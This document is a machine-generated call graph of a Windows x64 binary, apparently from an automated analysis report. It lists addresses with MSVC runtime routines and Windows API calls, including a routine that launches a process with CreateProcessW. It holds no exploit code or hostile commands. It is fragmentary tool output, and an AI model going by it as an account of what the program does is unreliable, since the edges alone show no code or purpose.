15508->15498 15510 7ff767ef3a80 15511 7ff767ef3ab7 15510->15511 15513 7ff767ef3b32 15511->15513 15514 7ff767ef3b4d 15511->15514 15519 7ff767ef3ac7 15511->15519 15512 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 15515 7ff767ef3cdd 15512->15515 15528 7ff767efe150 15513->15528 15517 7ff767efe150 40 API calls 15514->15517 15523 7ff767ef3b6d BuildCatchObjectHelperInternal 15517->15523 15518 7ff767ef3c8f 15518->15519 15521 7ff767ef3d57 15518->15521 15519->15512 15522 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 15521->15522 15524 7ff767ef3d5c 15522->15524 15523->15518 15525 7ff767ef3d0e 15523->15525 15526 7ff767efe150 40 API calls 15523->15526 15549 7ff767ef5f70 15523->15549 15525->15518 15563 7ff767efec48 15525->15563 15526->15523 15529 7ff767efe16c 15528->15529 15530 7ff767efe18a 15528->15530 15531 7ff767f006a8 _set_fmode 11 API calls 15529->15531 15575 7ff767efe43c EnterCriticalSection 15530->15575 15533 7ff767efe171 15531->15533 15535 7ff767eff728 _invalid_parameter_noinfo 37 API calls 15533->15535 15541 7ff767efe17c 15535->15541 15541->15519 15552 7ff767ef5f9e 15549->15552 15561 7ff767ef60cc 15549->15561 15550 7ff767ef1230 39 API calls 15551 7ff767ef60d2 15550->15551 15554 7ff767ef5ff6 15552->15554 15555 7ff767ef6032 15552->15555 15559 7ff767ef5fe9 BuildCatchObjectHelperInternal 15552->15559 15553 7ff767ef7e98 std::_Facet_Register 39 API calls 15553->15559 15554->15553 15560 7ff767ef60c6 15554->15560 15556 7ff767ef7e98 std::_Facet_Register 39 API calls 15555->15556 15556->15559 15557 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 15557->15560 15558 7ff767ef1190 Concurrency::cancel_current_task 39 API calls 15558->15561 15559->15557 15562 7ff767ef6084 BuildCatchObjectHelperInternal 15559->15562 15560->15558 15561->15550 15562->15523 15564 7ff767efec61 15563->15564 15565 7ff767efec7f 15563->15565 15566 7ff767f006a8 _set_fmode 11 API calls 15564->15566 15576 7ff767efe43c EnterCriticalSection 15565->15576 15569 7ff767efec66 15566->15569 15571 7ff767eff728 _invalid_parameter_noinfo 37 API calls 15569->15571 15574 7ff767efec71 15571->15574 15574->15525 15582 7ff767ef3470 15583 7ff767ef3493 15582->15583 15584 7ff767ef353d 15583->15584 15590 7ff767efe9dc 15583->15590 15586 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 15584->15586 15587 7ff767ef3593 15586->15587 15588 7ff767ef34b6 15588->15584 15589 7ff767efe3f4 37 API calls 15588->15589 15589->15584 15593 7ff767efea0a 15590->15593 15591 7ff767efea2f 15592 7ff767eff65c _invalid_parameter_noinfo_noreturn 37 API calls 15591->15592 15596 7ff767efea58 15592->15596 15593->15591 15594 7ff767efea82 15593->15594 15597 7ff767efe8b4 15594->15597 15596->15588 15604 7ff767efe43c EnterCriticalSection 15597->15604 15893 7ff767f137fc 15894 7ff767f1380b 15893->15894 15895 7ff767f13815 15893->15895 15897 7ff767efff84 LeaveCriticalSection 15894->15897 13252 7ff767ef8224 13277 7ff767ef7f10 13252->13277 13255 7ff767ef8370 13372 7ff767ef8ab0 IsProcessorFeaturePresent 13255->13372 13256 7ff767ef8240 __scrt_acquire_startup_lock 13258 7ff767ef837a 13256->13258 13259 7ff767ef825e 13256->13259 13260 7ff767ef8ab0 7 API calls 13258->13260 13265 7ff767ef827f __scrt_release_startup_lock 13259->13265 13285 7ff767f01ef0 13259->13285 13263 7ff767ef8385 BuildCatchObjectHelperInternal 13260->13263 13262 7ff767ef8283 13264 7ff767ef8309 13289 7ff767ef8bf8 13264->13289 13265->13262 13265->13264 13361 7ff767f011d4 13265->13361 13267 7ff767ef830e 13292 7ff767f01e3c 13267->13292 13274 7ff767ef8331 13274->13263 13368 7ff767ef8094 13274->13368 13278 7ff767ef7f18 13277->13278 13279 7ff767ef7f24 __scrt_dllmain_crt_thread_attach 13278->13279 13280 7ff767ef7f31 13279->13280 13281 7ff767ef7f2d 13279->13281 13379 7ff767f01d54 13280->13379 13281->13255 13281->13256 13286 7ff767f01f03 13285->13286 13287 7ff767f01f2a 13286->13287 13830 7ff767ef8140 13286->13830 13287->13265 13960 7ff767f12940 13289->13960 13291 7ff767ef8c0f GetStartupInfoW 13291->13267 13293 7ff767f0b8d8 66 API calls 13292->13293 13294 7ff767f01e4b 13293->13294 13295 7ff767ef8316 13294->13295 13296 7ff767f0bc88 45 API calls 13294->13296 13297 7ff767ef28c0 13295->13297 13296->13294 13962 7ff767ef5db0 13297->13962 13299 7ff767ef2933 13976 7ff767ef6d0c 13299->13976 13303 7ff767ef2962 13356 7ff767ef32b5 13303->13356 13997 7ff767ef6af4 13303->13997 13306 7ff767ef32c7 14158 7ff767ef1660 13306->14158 13308 7ff767ef2a52 13316 7ff767ef32d9 13308->13316 14002 7ff767ef51a0 13308->14002 13311 7ff767ef32cd 14164 7ff767ef19d0 13311->14164 13315 7ff767ef32e3 13320 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 13315->13320 13321 7ff767ef19d0 2 API calls 13316->13321 13318 7ff767ef2a30 13322 7ff767ef6b1c __std_fs_convert_wide_to_narrow 5 API calls 13318->13322 13319 7ff767ef2a78 __scrt_get_show_window_mode 13319->13315 14007 7ff767ef4d20 13319->14007 13326 7ff767ef32e9 13320->13326 13321->13315 13322->13308 13325 7ff767ef2bc5 13325->13326 14056 7ff767ef5cb0 13325->14056 14168 7ff767ef1e40 13326->14168 13329 7ff767ef2bbc 14050 7ff767ef4c20 13329->14050 13330 7ff767ef2c25 14070 7ff767ef5710 13330->14070 13335 7ff767ef332d 14179 7ff767ef9d80 13335->14179 13336 7ff767ef5710 39 API calls 13338 7ff767ef2ca4 13336->13338 13343 7ff767ef2cbf BuildCatchObjectHelperInternal 13338->13343 14114 7ff767ef66c0 13338->14114 13339 7ff767ef333d 13341 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 13339->13341 13342 7ff767ef3343 13341->13342 13345 7ff767ef2db0 BuildCatchObjectHelperInternal 13343->13345 14128 7ff767ef59a0 13343->14128 14084 7ff767ef6410 13345->14084 13347 7ff767ef2e46 13348 7ff767ef59a0 39 API calls 13347->13348 13351 7ff767ef2e59 13347->13351 13348->13351 13349 7ff767ef3064 CreateProcessW 13350 7ff767ef3102 WaitForSingleObject CloseHandle CloseHandle 13349->13350 13354 7ff767ef3125 13349->13354 13350->13354 13351->13339 13351->13349 13353 7ff767ef32b0 14146 7ff767eff748 13353->14146 13354->13353 14142 7ff767ef40a0 13354->14142 14151 7ff767ef2850 13356->14151 13357 7ff767ef3279 13359 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 13357->13359 13358 7ff767ef3203 13358->13353 13358->13357 13360 7ff767ef328f 13359->13360 13366 7ff767ef8c3c GetModuleHandleW 13360->13366 13362 7ff767f0120c 13361->13362 13363 7ff767f011eb 13361->13363 14831 7ff767f039b4 13362->14831 13363->13264 13367 7ff767ef8c4d 13366->13367 13367->13274 13370 7ff767ef80a5 13368->13370 13369 7ff767ef80b5 13369->13262 13370->13369 13371 7ff767ef9e78 7 API calls 13370->13371 13371->13369 13373 7ff767ef8ad6 __scrt_get_show_window_mode BuildCatchObjectHelperInternal 13372->13373 13374 7ff767ef8af5 RtlCaptureContext RtlLookupFunctionEntry 13373->13374 13375 7ff767ef8b1e RtlVirtualUnwind 13374->13375 13376 7ff767ef8b5a __scrt_get_show_window_mode 13374->13376 13375->13376 13377 7ff767ef8b8c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13376->13377 13378 7ff767ef8bda BuildCatchObjectHelperInternal 13377->13378 13378->13258 13380 7ff767f0bdfc 13379->13380 13381 7ff767ef7f36 13380->13381 13391 7ff767f0b8d8 13380->13391 13397 7ff767f0b820 13380->13397 13412 7ff767f04e84 13380->13412 13381->13281 13385 7ff767ef9e78 13381->13385 13386 7ff767ef9e80 13385->13386 13387 7ff767ef9e8a 13385->13387 13809 7ff767efa268 13386->13809 13387->13281 13392 7ff767f0b92a 13391->13392 13393 7ff767f0b8e5 13391->13393 13392->13380 13423 7ff767f04a00 13393->13423 13398 7ff767f0b843 13397->13398 13399 7ff767f0b84d 13398->13399 13807 7ff767efff30 EnterCriticalSection 13398->13807 13402 7ff767f0b8bf 13399->13402 13403 7ff767effe88 BuildCatchObjectHelperInternal 45 API calls 13399->13403 13402->13380 13405 7ff767f0b8d7 13403->13405 13407 7ff767f0b92a 13405->13407 13409 7ff767f04a00 50 API calls 13405->13409 13407->13380 13410 7ff767f0b914 13409->13410 13411 7ff767f0b5b0 66 API calls 13410->13411 13411->13407 13808 7ff767efff30 EnterCriticalSection 13412->13808 13414 7ff767f04e94 13415 7ff767f0c144 43 API calls 13414->13415 13416 7ff767f04e9d 13415->13416 13417 7ff767f04eab 13416->13417 13418 7ff767f04c8c 45 API calls 13416->13418 13419 7ff767efff84 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 13417->13419 13420 7ff767f04ea6 13418->13420 13421 7ff767f04eb7 13419->13421 13422 7ff767f04d7c GetStdHandle GetFileType 13420->13422 13421->13380 13422->13417 13424 7ff767f04a11 FlsGetValue 13423->13424 13425 7ff767f04a2c FlsSetValue 13423->13425 13426 7ff767f04a26 13424->13426 13427 7ff767f04a1e 13424->13427 13425->13427 13428 7ff767f04a39 13425->13428 13426->13425 13429 7ff767f04a24 13427->13429 13484 7ff767effe88 13427->13484 13466 7ff767f062d4 13428->13466 13443 7ff767f0b5b0 13429->13443 13434 7ff767f04a66 FlsSetValue 13436 7ff767f04a84 13434->13436 13437 7ff767f04a72 FlsSetValue 13434->13437 13435 7ff767f04a56 FlsSetValue 13438 7ff767f04a5f 13435->13438 13479 7ff767f046dc 13436->13479 13437->13438 13473 7ff767f05ce8 13438->13473 13444 7ff767f0b820 66 API calls 13443->13444 13445 7ff767f0b5e5 13444->13445 13645 7ff767f0b2b0 13445->13645 13448 7ff767f0b602 13448->13392 13451 7ff767f0b61b 13452 7ff767f05ce8 __free_lconv_mon 11 API calls 13451->13452 13452->13448 13453 7ff767f0b62a 13453->13453 13659 7ff767f0b954 13453->13659 13456 7ff767f0b726 13457 7ff767f006a8 _set_fmode 11 API calls 13456->13457 13459 7ff767f0b72b 13457->13459 13458 7ff767f0b781 13461 7ff767f0b7e8 13458->13461 13670 7ff767f0b0e0 13458->13670 13462 7ff767f05ce8 __free_lconv_mon 11 API calls 13459->13462 13460 7ff767f0b740 13460->13458 13463 7ff767f05ce8 __free_lconv_mon 11 API calls 13460->13463 13465 7ff767f05ce8 __free_lconv_mon 11 API calls 13461->13465 13462->13448 13463->13458 13465->13448 13471 7ff767f062e5 _set_fmode 13466->13471 13467 7ff767f06336 13496 7ff767f006a8 13467->13496 13468 7ff767f0631a HeapAlloc 13470 7ff767f04a48 13468->13470 13468->13471 13470->13434 13470->13435 13471->13467 13471->13468 13493 7ff767f00d10 13471->13493 13474 7ff767f05d1c 13473->13474 13475 7ff767f05ced HeapFree 13473->13475 13474->13427 13475->13474 13476 7ff767f05d08 GetLastError 13475->13476 13477 7ff767f05d15 __free_lconv_mon 13476->13477 13478 7ff767f006a8 _set_fmode 9 API calls 13477->13478 13478->13474 13522 7ff767f045b4 13479->13522 13536 7ff767f08b84 13484->13536 13499 7ff767f00d50 13493->13499 13505 7ff767f04aa4 GetLastError 13496->13505 13498 7ff767f006b1 13498->13470 13504 7ff767efff30 EnterCriticalSection 13499->13504 13501 7ff767f00d5d 13502 7ff767efff84 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 13501->13502 13503 7ff767f00d22 13502->13503 13503->13471 13506 7ff767f04ae5 FlsSetValue 13505->13506 13509 7ff767f04ac8 13505->13509 13507 7ff767f04ad5 13506->13507 13508 7ff767f04af7 13506->13508 13510 7ff767f04b51 SetLastError 13507->13510 13511 7ff767f062d4 _set_fmode 5 API calls 13508->13511 13509->13506 13509->13507 13510->13498 13512 7ff767f04b06 13511->13512 13513 7ff767f04b24 FlsSetValue 13512->13513 13514 7ff767f04b14 FlsSetValue 13512->13514 13516 7ff767f04b42 13513->13516 13517 7ff767f04b30 FlsSetValue 13513->13517 13515 7ff767f04b1d 13514->13515 13518 7ff767f05ce8 __free_lconv_mon 5 API calls 13515->13518 13519 7ff767f046dc _set_fmode 5 API calls 13516->13519 13517->13515 13518->13507 13520 7ff767f04b4a 13519->13520 13521 7ff767f05ce8 __free_lconv_mon 5 API calls 13520->13521 13521->13510 13534 7ff767efff30 EnterCriticalSection 13522->13534 13570 7ff767f08b3c 13536->13570 13575 7ff767efff30 EnterCriticalSection 13570->13575 13685 7ff767f006c8 13645->13685 13648 7ff767f0b2d0 GetOEMCP 13650 7ff767f0b2f7 13648->13650 13649 7ff767f0b2e2 13649->13650 13651 7ff767f0b2e7 GetACP 13649->13651 13650->13448 13652 7ff767f08e50 13650->13652 13651->13650 13653 7ff767f08e9b 13652->13653 13657 7ff767f08e5f _set_fmode 13652->13657 13654 7ff767f006a8 _set_fmode 11 API calls 13653->13654 13656 7ff767f08e99 13654->13656 13655 7ff767f08e82 HeapAlloc 13655->13656 13655->13657 13656->13451 13656->13453 13657->13653 13657->13655 13658 7ff767f00d10 std::_Facet_Register 2 API calls 13657->13658 13658->13657 13660 7ff767f0b2b0 47 API calls 13659->13660 13661 7ff767f0b981 13660->13661 13662 7ff767f0bad7 13661->13662 13663 7ff767f0b9be IsValidCodePage 13661->13663 13669 7ff767f0b9d8 __scrt_get_show_window_mode 13661->13669 13664 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 13662->13664 13663->13662 13665 7ff767f0b9cf 13663->13665 13666 7ff767f0b71d 13664->13666 13667 7ff767f0b9fe GetCPInfo 13665->13667 13665->13669 13666->13456 13666->13460 13667->13662 13667->13669 13717 7ff767f0b3c8 13669->13717 13806 7ff767efff30 EnterCriticalSection 13670->13806 13686 7ff767f006ec 13685->13686 13687 7ff767f006e7 13685->13687 13686->13687 13688 7ff767f0492c _Getctype 45 API calls 13686->13688 13687->13648 13687->13649 13689 7ff767f00707 13688->13689 13693 7ff767f08a64 13689->13693 13694 7ff767f08a79 13693->13694 13695 7ff767f0072a 13693->13695 13694->13695 13701 7ff767f0d8c0 13694->13701 13697 7ff767f08ad0 13695->13697 13698 7ff767f08af8 13697->13698 13699 7ff767f08ae5 13697->13699 13698->13687 13699->13698 13714 7ff767f0b938 13699->13714 13702 7ff767f0492c _Getctype 45 API calls 13701->13702 13703 7ff767f0d8cf 13702->13703 13705 7ff767f0d91a 13703->13705 13713 7ff767efff30 EnterCriticalSection 13703->13713 13705->13695 13715 7ff767f0492c _Getctype 45 API calls 13714->13715 13716 7ff767f0b941 13715->13716 13718 7ff767f0b405 GetCPInfo 13717->13718 13719 7ff767f0b4fb 13717->13719 13718->13719 13724 7ff767f0b418 13718->13724 13720 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 13719->13720 13722 7ff767f0b59a 13720->13722 13722->13662 13728 7ff767f08508 13724->13728 13727 7ff767f089cc 55 API calls 13727->13719 13729 7ff767f006c8 TranslateName 45 API calls 13728->13729 13730 7ff767f0854a 13729->13730 13748 7ff767f0a2e0 13730->13748 13732 7ff767f08587 13736 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 13732->13736 13733 7ff767f085b0 std::_Locinfo::_Locinfo_ctor __scrt_get_show_window_mode 13738 7ff767f08644 13733->13738 13740 7ff767f0a2e0 _fread_nolock MultiByteToWideChar 13733->13740 13734 7ff767f08580 13734->13732 13734->13733 13735 7ff767f08e50 std::_Locinfo::_Locinfo_ctor 12 API calls 13734->13735 13734->13738 13735->13733 13737 7ff767f0867d 13736->13737 13743 7ff767f089cc 13737->13743 13738->13732 13739 7ff767f05ce8 __free_lconv_mon 11 API calls 13738->13739 13739->13732 13741 7ff767f08626 13740->13741 13741->13738 13742 7ff767f0862a GetStringTypeW 13741->13742 13742->13738 13744 7ff767f006c8 TranslateName 45 API calls 13743->13744 13745 7ff767f089f1 13744->13745 13751 7ff767f08698 13745->13751 13749 7ff767f0a2e9 MultiByteToWideChar 13748->13749 13752 7ff767f086d9 13751->13752 13753 7ff767f0a2e0 _fread_nolock MultiByteToWideChar 13752->13753 13757 7ff767f08723 13753->13757 13754 7ff767f089a1 13755 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 13754->13755 13756 7ff767f089af 13755->13756 13756->13727 13757->13754 13758 7ff767f08e50 std::_Locinfo::_Locinfo_ctor 12 API calls 13757->13758 13759 7ff767f0875b std::_Locinfo::_Locinfo_ctor 13757->13759 13770 7ff767f08859 13757->13770 13758->13759 13761 7ff767f0a2e0 _fread_nolock MultiByteToWideChar 13759->13761 13759->13770 13760 7ff767f05ce8 __free_lconv_mon 11 API calls 13760->13754 13762 7ff767f087ce 13761->13762 13762->13770 13782 7ff767f0696c 13762->13782 13765 7ff767f08819 13769 7ff767f0696c __crtLCMapStringW 7 API calls 13765->13769 13765->13770 13766 7ff767f0893c 13766->13770 13771 7ff767f05ce8 __free_lconv_mon 11 API calls 13766->13771 13767 7ff767f0886a 13767->13766 13768 7ff767f08e50 std::_Locinfo::_Locinfo_ctor 12 API calls 13767->13768 13772 7ff767f08888 std::_Locinfo::_Locinfo_ctor 13767->13772 13768->13772 13769->13770 13770->13754 13770->13760 13771->13770 13772->13770 13773 7ff767f0696c __crtLCMapStringW 7 API calls 13772->13773 13774 7ff767f08908 13773->13774 13774->13766 13775 7ff767f08928 13774->13775 13776 7ff767f0893e 13774->13776 13790 7ff767f0a370 13775->13790 13778 7ff767f0a370 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 13776->13778 13779 7ff767f08936 13778->13779 13779->13766 13780 7ff767f08956 13779->13780 13780->13770 13781 7ff767f05ce8 __free_lconv_mon 11 API calls 13780->13781 13781->13770 13793 7ff767f06400 13782->13793 13785 7ff767f069b2 LCMapStringEx 13787 7ff767f06a43 13785->13787 13786 7ff767f06a11 13803 7ff767f06a58 13786->13803 13787->13765 13787->13767 13787->13770 13789 7ff767f06a1b LCMapStringW 13789->13787 13792 7ff767f0a394 WideCharToMultiByte 13790->13792 13794 7ff767f0645d 13793->13794 13801 7ff767f06458 __vcrt_InitializeCriticalSectionEx 13793->13801 13794->13785 13794->13786 13795 7ff767f0648d LoadLibraryExW 13796 7ff767f06562 13795->13796 13797 7ff767f064b2 GetLastError 13795->13797 13798 7ff767f06582 GetProcAddress 13796->13798 13799 7ff767f06579 FreeLibrary 13796->13799 13797->13801 13798->13794 13800 7ff767f06593 13798->13800 13799->13798 13800->13794 13801->13794 13801->13795 13801->13798 13802 7ff767f064ec LoadLibraryExW 13801->13802 13802->13796 13802->13801 13804 7ff767f06400 __crtLCMapStringW 5 API calls 13803->13804 13805 7ff767f06a86 __crtLCMapStringW 13804->13805 13805->13789 13810 7ff767ef9e85 13809->13810 13811 7ff767efa277 13809->13811 13813 7ff767efd410 13810->13813 13817 7ff767efd684 13811->13817 13814 7ff767efd43b 13813->13814 13815 7ff767efd43f 13814->13815 13816 7ff767efd41e DeleteCriticalSection 13814->13816 13815->13387 13816->13814 13821 7ff767efd4ec 13817->13821 13822 7ff767efd5d6 TlsFree 13821->13822 13823 7ff767efd530 __vcrt_InitializeCriticalSectionEx 13821->13823 13823->13822 13824 7ff767efd55e LoadLibraryExW 13823->13824 13827 7ff767efd61d GetProcAddress 13823->13827 13829 7ff767efd5a1 LoadLibraryExW 13823->13829 13825 7ff767efd57f GetLastError 13824->13825 13826 7ff767efd5fd 13824->13826 13825->13823 13826->13827 13828 7ff767efd614 FreeLibrary 13826->13828 13827->13822 13828->13827 13829->13823 13829->13826 13831 7ff767ef8150 13830->13831 13847 7ff767f01f68 13831->13847 13833 7ff767ef815c 13853 7ff767ef7f4c 13833->13853 13835 7ff767ef8ab0 7 API calls 13837 7ff767ef81f5 13835->13837 13836 7ff767ef8174 _RTC_Initialize 13845 7ff767ef81c9 13836->13845 13858 7ff767ef80fc 13836->13858 13837->13286 13839 7ff767ef8189 13861 7ff767f01448 13839->13861 13843 7ff767ef819e 13844 7ff767f02638 45 API calls 13843->13844 13844->13845 13845->13835 13846 7ff767ef81e5 13845->13846 13846->13286 13848 7ff767f01f79 13847->13848 13849 7ff767f006a8 _set_fmode 11 API calls 13848->13849 13851 7ff767f01f81 13848->13851 13850 7ff767f01f90 13849->13850 13852 7ff767eff728 _invalid_parameter_noinfo 37 API calls 13850->13852 13851->13833 13852->13851 13854 7ff767ef7f5d 13853->13854 13857 7ff767ef7f62 __scrt_release_startup_lock 13853->13857 13855 7ff767ef8ab0 7 API calls 13854->13855 13854->13857 13856 7ff767ef7fd6 13855->13856 13857->13836 13895 7ff767ef80c0 13858->13895 13860 7ff767ef8105 13860->13839 13862 7ff767ef8195 13861->13862 13863 7ff767f01468 13861->13863 13862->13845 13894 7ff767ef8db0 InitializeSListHead 13862->13894 13864 7ff767f01486 13863->13864 13865 7ff767f01470 13863->13865 13867 7ff767f0b8d8 66 API calls 13864->13867 13866 7ff767f006a8 _set_fmode 11 API calls 13865->13866 13868 7ff767f01475 13866->13868 13869 7ff767f0148b 13867->13869 13870 7ff767eff728 _invalid_parameter_noinfo 37 API calls 13868->13870 13910 7ff767f0afbc GetModuleFileNameW 13869->13910 13870->13862 13877 7ff767f01515 13880 7ff767f01220 45 API calls 13877->13880 13878 7ff767f014fd 13879 7ff767f006a8 _set_fmode 11 API calls 13878->13879 13881 7ff767f01502 13879->13881 13883 7ff767f01531 13880->13883 13882 7ff767f05ce8 __free_lconv_mon 11 API calls 13881->13882 13884 7ff767f01510 13882->13884 13886 7ff767f01563 13883->13886 13887 7ff767f0157c 13883->13887 13892 7ff767f01537 13883->13892 13884->13862 13885 7ff767f05ce8 __free_lconv_mon 11 API calls 13885->13862 13888 7ff767f05ce8 __free_lconv_mon 11 API calls 13886->13888 13890 7ff767f05ce8 __free_lconv_mon 11 API calls 13887->13890 13889 7ff767f0156c 13888->13889 13891 7ff767f05ce8 __free_lconv_mon 11 API calls 13889->13891 13890->13892 13893 7ff767f01578 13891->13893 13892->13885 13893->13862 13896 7ff767ef80da 13895->13896 13898 7ff767ef80d3 13895->13898 13899 7ff767f01be0 13896->13899 13898->13860 13902 7ff767f0181c 13899->13902 13909 7ff767efff30 EnterCriticalSection 13902->13909 13911 7ff767f0b001 GetLastError 13910->13911 13912 7ff767f0b015 13910->13912 13934 7ff767f0061c 13911->13934 13914 7ff767f006c8 TranslateName 45 API calls 13912->13914 13915 7ff767f0b043 13914->13915 13918 7ff767f0b054 13915->13918 13939 7ff767f06614 13915->13939 13916 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 13920 7ff767f014a2 13916->13920 13942 7ff767f0097c 13918->13942 13922 7ff767f01220 13920->13922 13921 7ff767f0b00e 13921->13916 13923 7ff767f0125e 13922->13923 13926 7ff767f012ca 13923->13926 13956 7ff767f0bc88 13923->13956 13925 7ff767f013bb 13928 7ff767f013e8 13925->13928 13926->13925 13927 7ff767f0bc88 45 API calls 13926->13927 13927->13926 13929 7ff767f01400 13928->13929 13930 7ff767f01438 13928->13930 13929->13930 13931 7ff767f062d4 _set_fmode 11 API calls 13929->13931 13930->13877 13930->13878 13932 7ff767f0142e 13931->13932 13933 7ff767f05ce8 __free_lconv_mon 11 API calls 13932->13933 13933->13930 13935 7ff767f04aa4 _set_fmode 11 API calls 13934->13935 13936 7ff767f00629 __free_lconv_mon 13935->13936 13937 7ff767f04aa4 _set_fmode 11 API calls 13936->13937 13938 7ff767f0064b 13937->13938 13938->13921 13940 7ff767f06400 __crtLCMapStringW 5 API calls 13939->13940 13941 7ff767f06634 13940->13941 13941->13918 13943 7ff767f009bb 13942->13943 13945 7ff767f009a0 13942->13945 13944 7ff767f0a370 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 13943->13944 13946 7ff767f009c0 13943->13946 13947 7ff767f00a17 13944->13947 13945->13921 13946->13945 13949 7ff767f006a8 _set_fmode 11 API calls 13946->13949 13947->13946 13948 7ff767f00a1e GetLastError 13947->13948 13951 7ff767f00a49 13947->13951 13950 7ff767f0061c _fread_nolock 11 API calls 13948->13950 13949->13945 13952 7ff767f00a2b 13950->13952 13953 7ff767f0a370 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 13951->13953 13954 7ff767f006a8 _set_fmode 11 API calls 13952->13954 13955 7ff767f00a70 13953->13955 13954->13945 13955->13945 13955->13948 13957 7ff767f0bc14 13956->13957 13958 7ff767f006c8 TranslateName 45 API calls 13957->13958 13959 7ff767f0bc38 13958->13959 13959->13923 13961 7ff767f12930 13960->13961 13961->13291 13961->13961 13963 7ff767ef5f5d 13962->13963 13966 7ff767ef5ddf 13962->13966 14199 7ff767ef1230 13963->14199 13967 7ff767ef5f57 13966->13967 13968 7ff767ef5e61 13966->13968 13969 7ff767ef5e8d 13966->13969 13974 7ff767ef5e45 BuildCatchObjectHelperInternal 13966->13974 14193 7ff767ef1190 13967->14193 13968->13967 14184 7ff767ef7e98 13968->14184 13971 7ff767ef7e98 std::_Facet_Register 39 API calls 13969->13971 13971->13974 13973 7ff767ef5efb BuildCatchObjectHelperInternal 13973->13299 13974->13973 13975 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 13974->13975 13975->13967 14229 7ff767ef6aa4 GetModuleHandleW GetProcAddress 13976->14229 13979 7ff767ef6d3c GetFileAttributesW 13981 7ff767ef2949 13979->13981 13982 7ff767ef6d4a 13979->13982 13980 7ff767ef6d2c GetLastError 13980->13981 13991 7ff767ef4590 13981->13991 13982->13981 13983 7ff767ef6d54 13982->13983 14231 7ff767ef6db0 CreateFileW 13983->14231 13986 7ff767ef6d84 13986->13981 13987 7ff767ef6d7a CloseHandle 13987->13986 13988 7ff767ef6da8 13987->13988 13989 7ff767effe88 BuildCatchObjectHelperInternal 45 API calls 13988->13989 13990 7ff767ef6dad 13989->13990 13992 7ff767ef45bd 13991->13992 13993 7ff767ef45a2 13991->13993 13994 7ff767ef45d2 13992->13994 13995 7ff767ef5db0 39 API calls 13992->13995 13993->13303 13994->13303 13996 7ff767ef4613 13995->13996 13996->13303 14234 7ff767eff7c0 13997->14234 14000 7ff767ef6b06 AreFileApisANSI 14001 7ff767ef29cd 14000->14001 14001->13306 14001->13308 14098 7ff767ef6b1c 14001->14098 14003 7ff767ef5202 14002->14003 14006 7ff767ef51c3 BuildCatchObjectHelperInternal 14002->14006 14239 7ff767ef60e0 14003->14239 14005 7ff767ef5218 14005->13319 14006->13319 14008 7ff767ef7e98 std::_Facet_Register 39 API calls 14007->14008 14009 7ff767ef4e2f 14008->14009 14253 7ff767ef7204 14009->14253 14014 7ff767ef4e79 14016 7ff767ef7e98 std::_Facet_Register 39 API calls 14014->14016 14015 7ff767ef50f1 14022 7ff767ef1e40 81 API calls 14015->14022 14017 7ff767ef4efa 14016->14017 14018 7ff767ef7204 55 API calls 14017->14018 14019 7ff767ef4f0a 14018->14019 14282 7ff767ef761c 14019->14282 14023 7ff767ef5131 14022->14023 14026 7ff767ef9d80 std::_Xinvalid_argument 2 API calls 14023->14026 14024 7ff767ef50be 14031 7ff767ef5142 14024->14031 14037 7ff767ef505d 14024->14037 14025 7ff767ef4f8a 14290 7ff767efe3f4 14025->14290 14026->14031 14029 7ff767ef7e70 BuildCatchObjectHelperInternal 8 API calls 14030 7ff767ef2b72 14029->14030 14030->13325 14038 7ff767ef4370 14030->14038 14033 7ff767ef1e40 81 API calls 14031->14033 14034 7ff767ef5184 14033->14034 14035 7ff767ef9d80 std::_Xinvalid_argument 2 API calls 14034->14035 14036 7ff767ef5195 14035->14036 14037->14029 14039 7ff767ef43b1 14038->14039 14040 7ff767ef43c6 14039->14040 14723 7ff767ef5290 14039->14723 14042 7ff767ef44af 14040->14042 14044 7ff767ef4471 14040->14044 14046 7ff767ef1e40 81 API calls 14042->14046 14043 7ff767ef4482 14043->13329 14044->14043 14737 7ff767ef53f0 14044->14737 14047 7ff767ef44f1 14046->14047 14048 7ff767ef9d80 std::_Xinvalid_argument 2 API calls 14047->14048 14049 7ff767ef4502 14048->14049 14049->13329 14051 7ff767ef4c3a 14050->14051 14055 7ff767ef4c8a 14050->14055 14748 7ff767ef4b30 14051->14748 14053 7ff767ef4c74 14054 7ff767efe074 74 API calls 14053->14054 14054->14055 14055->13325 14058 7ff767ef5cd6 14056->14058 14069 7ff767ef5da4 14056->14069 14057 7ff767ef1230 39 API calls 14060 7ff767ef5daa 14057->14060 14059 7ff767ef5d0c 14058->14059 14062 7ff767ef5cdc BuildCatchObjectHelperInternal 14058->14062 14063 7ff767ef5d65 14058->14063 14061 7ff767ef7e98 std::_Facet_Register 39 API calls 14059->14061 14065 7ff767ef5d9e 14059->14065 14064 7ff767ef5d22 14061->14064 14062->13330 14066 7ff767ef7e98 std::_Facet_Register 39 API calls 14063->14066 14064->14062 14068 7ff767eff748 _invalid_parameter_noinfo_noreturn 37 API calls 14064->14068 14067 7ff767ef1190 Concurrency::cancel_current_task 39 API calls 14065->14067 14066->14062 14067->14069 14068->14065 14069->14057 14071 7ff767ef2c63 14070->14071 14073 7ff767ef574f 14070->14073 14071->13336 14072 7ff767ef1230 39 API calls 14074 7ff767ef5854 14072->14074 14073->14071 14075 7ff767ef5848 14073->14075 14076 7ff767ef5794 14073->14076 14077 7ff767ef57ec 14073->14077 14080 7ff767ef584e 14073->14080 14078 7ff767ef1190 Concurrency::cancel_current_task 39 API calls 14075->14078 14076->14075 14081 7ff767ef7e98 std::_Facet_Register 39 API calls 14076->14081 14079 7ff767ef7e98 std::_Facet_Register 39 API calls 14077->14079 14078->14080 14079->14071 